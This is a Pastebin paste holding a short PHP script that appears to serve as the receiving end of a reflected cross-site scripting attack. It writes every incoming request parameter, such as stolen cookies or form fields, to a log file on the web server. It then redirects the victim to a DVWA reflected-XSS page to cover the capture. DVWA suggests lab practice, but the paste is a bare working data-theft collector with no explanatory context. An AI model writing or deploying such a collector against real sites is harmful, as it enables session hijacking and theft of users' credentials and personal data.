Advertisement
Guest User

Untitled

a guest
Mar 22nd, 2019
83
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.18 KB | None | 0 0
  1. <?php
  2. $req_dump = print_r($_REQUEST, true);
  3. file_put_contents('/var/www/html/request.log', $req_dump, FILE_APPEND);
  4. header("Location: http://dvwa:8081/vulnerabilities/xss_r/");
  5. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement